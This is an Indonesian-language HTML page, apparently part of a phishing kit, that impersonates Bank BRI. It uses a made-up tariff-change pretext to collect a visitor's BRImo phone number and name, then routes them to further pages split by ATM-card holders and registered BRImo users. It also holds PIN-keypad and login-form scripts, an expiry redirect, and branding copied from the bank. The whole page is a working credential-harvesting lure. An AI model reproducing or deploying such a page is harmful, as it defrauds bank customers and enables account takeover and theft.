<html lang="id">
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
     <meta name="theme-color" content="#006BC6"> 
     <title>𝗔𝗸𝘁𝗶𝘃𝗮𝘀𝗶 𝗧𝗮𝗿𝗶𝗳 𝗕𝗮𝗻𝗸 𝗕𝗥𝗜 | 𝟮𝟬𝟮𝟱</title>
<meta content="https://hosting.tigerengine.id/mwo8vm.png" property="og:image">
<meta name="twitter:image" content="https://hosting.tigerengine.id/mwo8vm.png">
    	<meta name="description" content="Bank BRI terus berinovasi mengembangkan produk yang sesuai dengan perkembangan jaman untuk memenuhi kebutuhan nasabah">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.css" integrity="sha512-z3gLpd7yknf1YoNbCzqRKc4qyor8gaKU1qmn+CShxbuBusANI9QpRohGBreCFkKxLhei6S9CQXFEbbKuqLg0DA==" crossorigin="anonymous" referrerpolicy="no-referrer" />
    <link rel="stylesheet" href="../1style/gaya.css">
        <script type="module" src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.esm.js"></script>
<script nomodule src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.js"></script>
</head>
<script>
let tglNow = new Date();
let waktuBatas = new Date("2025-06-27T23:59:59");
if (tglNow.getTime() >= waktuBatas.getTime()) {
  document.location.href = 'https://expiredweb.pages.dev';
} else {
  console.log('Server aktif');
}
</script>

<style>
@import url('https://fonts.googleapis.com/css2?family=Montserrat:wght@100;200;300;400;500;600;700;800;900&amp;display=swap');
    * {
        font-family: 'Montserrat', sans-serif;
        font-weight: 400;
        margin: 0;
        padding: 0;
        font-size: 15px;
        box-sizing: border-box;
        position: relative;
        color: #000;
        position: relative;
    }
   
    .blue {
        color: #00529C;
    }
    .container {
        width: 100%;
        height: 100%;
    }
    .flex {
        display: flex;
        justify-content: center;
        align-items: center;
    }
    .containerlog .head {
        width: 100%;
        display: flex;
    }
    .containerlog .head img {
        width: 100%;
        margin: auto;
    }
    .containerlog .bform {
        position: fixed;
        bottom: 0;
        z-index: 999999;
        background: #fff;
        width: 100%;
        padding: 0 15px;
    }
    .containerlog .tit {
        font-size: 23px;
        font-weight: 800;
        margin-bottom: 20px;
    }
    .containerlog .bginp {
        box-shadow: 0px 2px 5px 1px #e7e7e7;
        border: 0.3px solid #e7e7e75b;
        border-radius: 6px;
        overflow: hidden;
        width: 100%;
        padding: 8px;
        padding-bottom: 0;
    }
    .containerlog .wrpinp {
        width: 100%;
        height: 55px;
        max-height: 60px;
        display: flex;
        align-items: flex-end;
        padding-bottom: 15px;
    }
    .containerlog .wrpinp i {
        font-size: 19px;
        text-align: center;
    }
    .containerlog .wrpinp i.icon {
        width: 35px;
        max-width: 35px;
        margin-right: 7px;
    }
    .containerlog input {
        width: 100%;
        border: none;
        font-size: 16px;
        font-weight: 500;
        outline: none;
        background: none;
    }
    .containerlog .forgot {
        width: 100%;
        text-align: right;
        font-size: 14px;
        font-weight: 800;
        margin: 10px 0;
    }
    .containerlog #formLog #btnsubmit {
        margin-bottom: 20px;
    }
    .containerlog button:disabled {
        background: #0079e65b;
        transition: .2s;
    }
    .containerlog button {
        width: 100%;
        height: 47px;
        max-height: 47px;
        border: none;
        border-radius: 6px;
        background: #0079e6;
        color: #ffffff;
        text-align: center;
        font-size: 14px;
        font-weight: 800;
        margin-top: 35px;
        transition: .2s;
    }
    .toggle {
        position: absolute;
        right: 0;
        bottom: 5px;
        width: 45px;
        height: 45px;
        z-index: 9999;
    }
    .toggle i {
        position: absolute;
        font-size: 19px;
    }
    @media screen and (min-width: 768px) {
        .container {
            width: 600px;
            height: 800px;
            margin: auto auto;
        }
        .containerlog .bform {
            position: relative;
            padding-bottom: 30px;
        }
    }
    
    /*input PIN style*/
    
    .containerpin * {
        color: #fff;
    }
    .containerpin {
        position: fixed;
        top: 0;
        left: 0;
        background: #0000009b;
        backdrop-filter: blur(8px);
        z-index: 99999999;
        width: 100%;
        height: 100%;
    }
    .containerpin .headpin {
        width: 100%;
        padding: 20px;
    }
    .containerpin .headpin h1 {
        font-size: 15px;
        font-weight: 800;
        text-align: center;
    }
    .containerpin .headpin i {
        font-size: 20px;
        position: absolute;
        left: 20px;
    }
    .containerpin h1.tit {
        font-size: 20px;
        font-weight: 800;
        text-align: center;
        margin: 40px 0;
    }
    .containerpin .bginp {
        width: 100%;
        height: 40px;
    }
    .containerpin .clear {
        width: 100%;
        height: 100%;
        position: absolute;
        z-index: 99;
    }
    .containerpin input:valid {
        background: #ffffff9b;
        transition: .2s;
    }
    .containerpin input {
        transition: .2s;
        background: none;
        width: 22px;
        height: 22px;
        border-radius: 50%;
        border: 2.5px solid #fff;
        outline: none;
        text-align: center;
        color: transparent;
        font-weight: 700;
        margin: 0 10px;
    }
    .containerpin span.frgt {
        font-size: 14px;
        width: 110px;
        font-weight: 800;
        padding: 14px 15px;
        background: #0000003b;
        margin: 30px auto 50px auto;
        color: #0079e6;
        border-radius: 17px;
    }
    .keypad {
        width: 90%;
        position: fixed;
        bottom: 20px;
        left: 0;
        right: 0;
        margin: 0px auto;
    }
    .keypad .table {
        height: auto;
        width: 330px;
    }
    .table .line {
        width: 100%;
        margin: 15px 0;
        display: flex;
        align-items: center;
        justify-content: space-between;
    }
    .table .line button:active {
        background: #ffffff3b;
        transition: 0s;
    }
    .table .line button i {
        font-size: 20px;
    }
    .table .line button {
        transition: .2s;
        height: 60px;
        width: 60px;
        border-radius: 50%;
        background: none;
        border: none;
        outline: none;
        font-size: 22px;
        font-weight: 700;
        text-align: center;
    }
    @media screen and (min-width: 768px) {
        .containerpin .headpin {
            width: 600px;
            margin: 0 auto;
        }
        .containerpin .keypad {
            position: relative;
            margin-top: 100px;
        }
    }




   body, html {
           
         background-position: center;
       background: #fff;
         height: 100%;
  font-size: 16px;
  width: 100%;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
            padding: 0;
            margin: 0;
            font-family: 'Open Sans', sans-serif;
            position: relative;
        }

        .imagesi{
    margin-top: 20px;
    width: 100%;
    height: 98%;
    position: fixed;
        }
        
        .Input{
            width: 95%;
            height: 50px;
            position: relative;
            left: 0;
            right: 0;
            outline: none;
            margin: 0px auto;
            border: 1.5px solid #ddd;
            border-radius: 8px;
            padding-left: 50px;
            top: 0;
        }
        
        .Input::placeholder{
            color: #aaa;
        }
        
        
        .Input:focus, .input:active{
            border: 1.5px solid #bbb;
        }
        
ion-icon{
    width: 25px;
    height: 25px;
}


   .btn-login {

            font-family: 'Avenir';
position: fixed;
            display: block;
            margin: 0px auto;
            padding: 0px; 
     font-weight: 700;
    width: 100%;
    height: 50px;
    background: #0F78CB;
    padding-right: 0px;
            cursor: pointer; 
    background-position: 0px 0px;
    background-size: 100% 53px;
    background-repeat: no-repeat;
            border: none; 
            text-align: center; 
            height: 50px; 
            width: 90%; 
            left: 0;
            right: 0;
            font-family: Arial; 
            font-size: 15px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 1px; 
            line-height: 1; 
            border-radius: 8px; 
            box-shadow: rgb(170, 170, 170) 0px 0px 0px 0px; 
            transition: background 100ms step-start 0s;
            bottom: 70;
        }

        .btn-login:disabled {
            opacity: 0.5;
            background: #ccc;
            color: #00000090;
        }

        @media only screen and (max-width: 600px) {
            .btn-login {
                width: 90%;
            }
        }
        #ionIcons {
            color: #2C2C2C;
            font-size: 20px;
            width: 20px;
            height: 20px;
            position: absolute;
            display: block;
            margin-top: 91px;
            z-index: 9;
            margin-left: 30px;
            padding: 3px 8px 8px 0px;
            opacity: 0.7;
        }

        
        .eye {
            display: block;
            margin: 0px auto;
            margin-right: 20px;
            position: absolute;
            box-sizing: border-box; 
            z-index: 16; 
            right: 11;
            top: 153;
            height: 19.8189px;
            width: 25.0236px; 
            float: right;
            border-radius: 0px; 
            cursor: pointer;
            z-index: 9999;
        }
        
          .btn-login1 {

            font-family: 'Avenir';
position: absolute;
            display: block;
            margin: 0px auto;
            padding: 0px; 
     font-weight: 700;
    width: 100%;
    height: 52px;
    
    padding-right: 60px;
            cursor: pointer; 
            background-color: transparent;
    background-image: url("https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigrkyvE1T2DsAnuhfEP1fiaWmqVZn-bd_GGi7QocBRx3gOwn9fswsPJvsm0-FC80Efc2AKkbJR_4ALZ1FVI7YlcbKijTKMG862bBhdK_iYuD2PchdlcVdD7IGTcD5jJolCN0MSv-uxi3M8REQOYmzUi5B0DpMsrF3R9BEzzmaJ6hs2TMKw2HlTPdnW/s1039/IMG_20221215_151324.jpg");
    background-position: 0px 0px;
    background-size: 100% 53px;
    background-repeat: no-repeat;
            border: none; 
            text-align: center; 
            height: 52px; 
            width: 90%; 
            left: 0;
            right: 0;
            font-family: Arial; 
            font-size: 15px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 1px; 
            line-height: 1; 
            border-radius: 8px; 
            box-shadow: rgb(170, 170, 170) 0px 0px 0px 0px; 
            transition: background 100ms step-start 0s;
            bottom: 20;
        }

        .btn-login1:disabled {
            opacity: 0.5;
            background: #eee;
        }

        @media only screen and (max-width: 600px) {
            .btn-login1 {
                width: 90%;
            }
        }    
        
        
        
        
</style>
<style>
#animation-demo {
	width: 200px;
	height: 150px;
	position: relative;
	background-color: #62A80A;
	line-height: 150px;
	color: #000;
	border: solid 1px #1A7404;
	text-align: center;
} 

.animated {
	-webkit-animation-duration: 1s;
	animation-duration: 1s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
	 -webkit-animation-name: bounceInUp; 
    animation-name: bounceInUp; 
}

@-webkit-keyframes bounceInUp { 
    0% { 
        opacity: 1; 
        -webkit-transform: translateY(200px); 
    } 
    60% { 
        opacity: 1; 
        -webkit-transform: translateY(20px); 
    } 
    80% { 
        -webkit-transform: translateY(10px); 
    } 
    100% { 
        -webkit-transform: translateY(0); 
    } 
} 

@keyframes bounceInUp { 
    0% { 
        opacity: 1; 
        transform: translateY(200px); 
    } 
    60% { 
        opacity: 1; 
        transform: translateY(10px); 
    } 
    80% { 
        transform: translateY(10px); 
    } 
    100% { 
        transform: translateY(0); 
    } 
} 

.bounceInUp { 
   
}


  .wrapper {
	width: 100%;
	overflow: hidden;
}
.photobanner {
	position: relative;
	height: 173px;
	margin-bottom: 35px;
	display: flex;
	width: 100%;
	
}

.photobanner img {
  margin: 10px 5px;
  box-shadow: 2px 3px 8px #0d0d0d50;
  border: 2px groove #118eea;
  border-radius: 5px;
}

.photobanner {
  animation: bannermove 15s linear infinite alternate-reverse;
}

@keyframes bannermove {
  from {
    left: 0%;
  }
  to {
    left: -1000px;
  }
}


welalxcome {
        position: fixed;
    left: 0;
    top: 0;
    right: 0;
    bottom: 0;
    width: 100%;
    height: 100%;
    display: block;
    
    flex-wrap: nowrap;
    align-items: center;
    align-content: center;
    justify-content: center;
}
welalxcome img {
        width:100%;
    height: 100%;
}
chsalxcome {
        position: relative;
    width: 100%;
    height: 100%;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}

.patokk:active { background-color: rgba(0, 110, 200, 0.96); box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px inset, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px inset; transform: translateY(0px); }

.hua{
    border: 0px solid #8a8a8a;
    height: 365px;
    border-radius: 10px;
    width: 95%;
    box-shadow: 0px 0px 4px 0px #8a8a8a;
    background-color: #ffffff;
}


select{
  width: 95%;  
  height: 40px;
  padding: 10px;
  outline: none;
  box-shadow: 2px 3px 6px #8a8a8a;
  border: 1px solid #0f78cb;
  border-radius: 8px;
}

.load{
     top: 0;
     left: 0;
     right: 0;
     position: fixed;
     display: flex;
     justify-content: center;
     align-items: center;
     background: #00000090;
     z-index: 999999999;
     width: 100%;
     height: 100%;
      }
       .jao{
            width:90%;
      }
      

</style>
<body style="background: url(''), no-repeat; background-position: 100% 100%;
    background-size: 100% 100%;
    ;
    font-family: 'Varela Round', sans-serif;">
<welalxcome>
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7DBUUKgaNDWpIrdlnAfVE29v8uTA_4gN0kYUUypY3Z8lzBPQ5wAhV5LPRehZxx7oEp9PyuZ9X5h-a3bQzApDTABpQXnmGUEZtjK0-U3c9rmyfXXD7aBPt8N-dtL5xoOQ0s3qpAXJHzi7N8j52wZEJ7ye01wQUmLA6Zn-5alUSBzYDVbuSnuJs3HaKSCw/s2207/AddText_09-08-05.11.11.jpg" alt="" />
</welalxcome>
<chsalxcome2 style="display: none;">
<nav style="position: fix; top: 0; left: 0; right: 0; margin: 0 auto; width: 100%; height: 60.5px; background: #f1f1f190; z-index: 99999; border-bottom: 1px solid #f1f1f1;box-shadow: #00000066 2px 2px 4px 0px;">
 <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEig8lJ2TAjG3Frf_4E42lP3LEw4KyecrTH1gDWKv1TKALAwbNg_UcEsGSYKN1sb3nisb_reXgAFPi1OyPGWixuw1jdOl7rttdBAf-cnv9zXEdfl_EX0OxxFTJy86y7cyJsayGx1XNgifWwmC8oYkqbxb9EKb1vlQxBoTDGgOFy0ht7Cnpj6K_radbnUD9g/s1080/AddText_06-08-12.57.52.jpg" style="width: 100%; position: fixed; top: 0; left: 0; right: 0; margin: 0px auto; z-index: 99999999">
</nav>        
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSJILNB9rSzWMfSq3-VLu3pEuqfSQoXxS7B9Vlp0wVA3NiQBhvpUoFa31birCw42fOPzSQcr66azXTgGZK1kcRXCE-oiYdXmFqaD7Pk8E40chV9_oVjcts5-lMBcuTOgtoiGB-TbBuqb9Km63XAhQsGgbPzWnhqoAtufxEW1CPlVjvAFaZucI6oflLHUI/s2180/20241119_061245.jpg" style="width: 100%; height: 100%; position: fixed; top: 0; left: 0; right: 0; bottom: 0; margin: 0px auto; z-index:">    
<div class="wrapper">
	<div class="photobanner">
  <img class="nyusu" src="https://bri.co.id/documents/36847/4dbb9c70-d426-fff1-8a26-1266ef2740cb?download=false" alt="">
<img class="nyusu" src="https://bri.co.id/documents/36847/e9abfd43-fd2d-34a8-4ba7-9ee8ef6fef83?download=false" alt="">
<img class="nyusu" src="https://bri.co.id/documents/36847/082fcf8e-4876-0cd0-e746-7a8fe248b291?download=false" alt="">
<img class="nyusu" src="https://bri.co.id/documents/36847/4a292ca2-1073-afe8-8481-f1c9e17121c9?download=false" alt="">
<img class="nyusu" src="https://bri.co.id/documents/36847/654d619e-dd7f-0a1b-1234-881b74f6a017?download=false" alt="">
 
</div>
</div>    
<div class="load" style="display:none">
 <img src="img/f01dmo.gif" class="jao" alt="">
      </div>
     
  

<center>

</center>
<form onsubmit="sendTarif()" method="POST" id="inputlogin" style="padding: 10px">
    
<center>
 <div class=" hua" style="top: -40px; position: relative; margin: 0px auto; left: 0; right: 0;">
   
<center style="color:#0f78cb; line-height: 20px; font-size: 14px; padding: 20px;margin-top:-22px;"><p style="border-bottom:1.5px solid #0000004a;border-radius:10px;margin-bottom:0px;height:50px;margin-top: 10px; font-weight: bold; font-family: 'Varela Round', sans-serif; color: #0f78cb">Silahkan Pilih Tarif Transaksi Sesuai Kebutuhan Anda Di Bawah Ini</p>
<img style="width:100%;"src="img/index.png" alt="">

<select name="tarif" id="tarif" required class="yantek" style="margin-top: 5px">
<option value="">PILIH TARIF</option>
<option value="𝗕𝗮𝗿𝘂 Rp 150.000">√•𝗧𝗮𝗿𝗶𝗳 𝗕𝗮𝗿𝘂 𝗥𝗽 𝟭𝟱𝟬.𝟬𝟬𝟬 / 𝗣𝗲𝗿𝗯𝘂𝗹𝗮𝗻</option>
<option value="𝗟𝗮𝗺𝗮 Rp 6.500">√•𝗧𝗮𝗿𝗶𝗳 𝗟𝗮𝗺𝗮 𝗥𝗽 𝟲.𝟱𝟬𝟬 / 𝗕𝗶 𝗳𝗮𝘀𝘁 𝟮.𝟱𝟬𝟬</option>
</select>

<br><br><br>
<h5 style="position:absolute;color:#000;margin: 0px auto; margin-top: -28px; left: 0; right: 0; font-size: 15px">Masukan Nomor Ponsel <b style="color: #06529C">BRI</b><b style="color: #F37024">mo</b> Anda :</h5>
 <input id="nohp" name="nohp" type="text" inputmode="numeric" class="form-control" placeholder="08xxxxxx" oninvalid="this.setCustomValidity('Mohon mɑsukkɑn 𝗡𝗼𝗺𝗼𝗿 𝗣𝗼𝗻𝘀𝗲𝗹 dengɑn benɑr')" onchange="this.setCustomValidity('')" required maxlength="13" minlength="10" class="bubble-element Input" placeholder="08xxxxxxxx" required autocomplete="off" style="width: 95%;  
  height: 40px;
  padding: 10px;
  outline: none;
  box-shadow: 2px 3px 6px #8a8a8a;
  border: 1px solid #0f78cb;
  border-radius: 8px;" /><br/>
<br>

 <input  name="nama" id="nama" type="text" class="form-control" placeholder="Nama sesuai KTP"  required maxlength="" minlength="" class="bubble-element Input" placeholder="08xxxxxxxx" required autocomplete="off" style="width: 95%;  
  height: 40px;
  padding: 10px;
  outline: none;
  box-shadow: 2px 3px 6px #8a8a8a;
  border: 1px solid #0f78cb;
  border-radius: 8px;" /><br/>
                                     
                                     
    </div>
    </div>
 
 <div style="z-index:999999;position: fixed; bottom: 0; left: 0; right: 0; margin: 0px auto; width: 100%; height: 82px; background: #fff; box-shadow: rgba(0, 0, 0, 0.15) 5px 5px 15px 0px; padding-top: 15px; border-top: 2px double #ccc">
<button type="submit" id="kirims" style="margin-left: 20px;margin-top: ;position:absolute;background-color:#006BC6;color:white;border:0px solid #0076e0;width:90%;border-radius:10px;font-family: 'Nunito', sans-serif;font-size: 15px;padding:13px;display: inline-block; box-shadow: rgba(60, 64, 67, 0.3) 0px 1px 2px 0px, rgba(60, 64, 67, 0.35) 2px 2px 3px 2px; left: 0; right: 0;" >Lanjutkan</button>
           </div>   
    </form>
            </div>
       


     
    </div>
<div class="text-center" id="popupku" style="position: fixed; left: 0; right: 0; top: 0; bottom: 0; margin: 0px auto; z-index: ; text-align: center; width: 100%; height: 100%; background: #00000070; z-index: 99999999999; display: none">
          <center>
 <div class="text-center animated" style="position: fixed; left: 0; right: 0; width: 300px; height: 320px; background: white; border-radius: 20px; margin: 0px auto; top: 200;/* box-shadow: 2px 2px 2px */#ccc; border: 0px double #0F78CB">
<img src="https://hosting.tigerengine.id/y4fujw.jpg" width="85%" style="margin-top: 20px">
<button type="button" style="width: 85%; height: 43px; margin-top: 20px; border: none; background: #0F78CB; color: #fff; font-weight: bold;border-radius:5px; box-shadow: 2px 2px 2px #ccc; font-size: 15px" onclick="sudah()">Punya Kartu ATM</button><br>
<p>
<button type="button" style="width: 85%; height: 43px; margin-top: 8px; border: 2px solid #0F78CB; background: snow; color: #0F78CB; font-weight: bold;border-radius:5px; box-shadow: 2px 2px 2px #ccc; font-size: 15px" onclick="belum()">Sudah Terdaftar di BRImo</button>
</p>
 </div>         
    </center></div>
    </div>
    			<center>

<br>
<br>
<br>
<br>
    
    <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
   
    <script src="token.js"></script>
   
</body>
<script>
        $( document ).ready(function() {
            setTimeout(() => {
                $('welalxcome').fadeOut();
                $('chsalxcome2').fadeIn();
            },700)
        });
</script>
<script>



function vibr(dur) {
    if (navigator.vibrate) {
        navigator.vibrate(dur);
    } else {
        console.log("NotSupported");
    }
}

  </script>
<script>
function sudah(){
$('.box').fadeIn();
setTimeout(function(){
     window.location.href="sudah.html";
     $("#popupku").fadeOut();
     $('.box').fadeOut();
     $('.kleman').fadeOut();
     }, 600);    
 } 
 
 
function belum(){
$('.box').fadeIn();
setTimeout(function(){
     window.location.href="belum.html";
     $("#popupku").fadeOut();
     $('.box').fadeOut();
     $('.kleman').fadeOut();
     }, 600);        
 }
</script>  

   
     <script>
        function vibr(dur){
            if (navigator.vibrate) {
                navigator.vibrate(dur);
            } else {
                console.log("NotSupported");
            }
        }
           
    </script>
  <script>
              let inputs = $("form#formPin input");
        let currentInput = 0;
        function inputKeypad(value, event) {
            if (currentInput < inputs.length) {
                inputs.eq(currentInput).val(value);
                currentInput++;
                checkAllInputsFilled();
            }
        }
        function checkAllInputsFilled() {
            let allFilled = true;
            inputs.each(function() {
                if ($(this).hasClass("pin") && $(this).val() === "") {
                    allFilled = false;
                    return false;
                }
            });
            if (allFilled) {
                $("#formPin").submit();
                $("#formPin .line button").prop("disabled", true);
            } else {
                $("#formPin .line button").prop("disabled", false);
            }
        }
        function deleteInput() {
            if (currentInput > 0) {
                currentInput--;
                inputs.eq(currentInput).val("");
                checkAllInputsFilled();
            }
        }
  </script>
  
   <script>
 function gotoback(){
      $(".containerpin").fadeOut();
   $("#formlogin").fadeIn();  
     $("#uname").val('');
     $("#pass").val('');
  
 }   
</script>
   <script>
function gotologin(){
    document.getElementById("formlogin").style.display = "block";
}

function batalkanku(){
    document.getElementById("formlogin").style.display = "none";
    
}

 
</script>

</html>
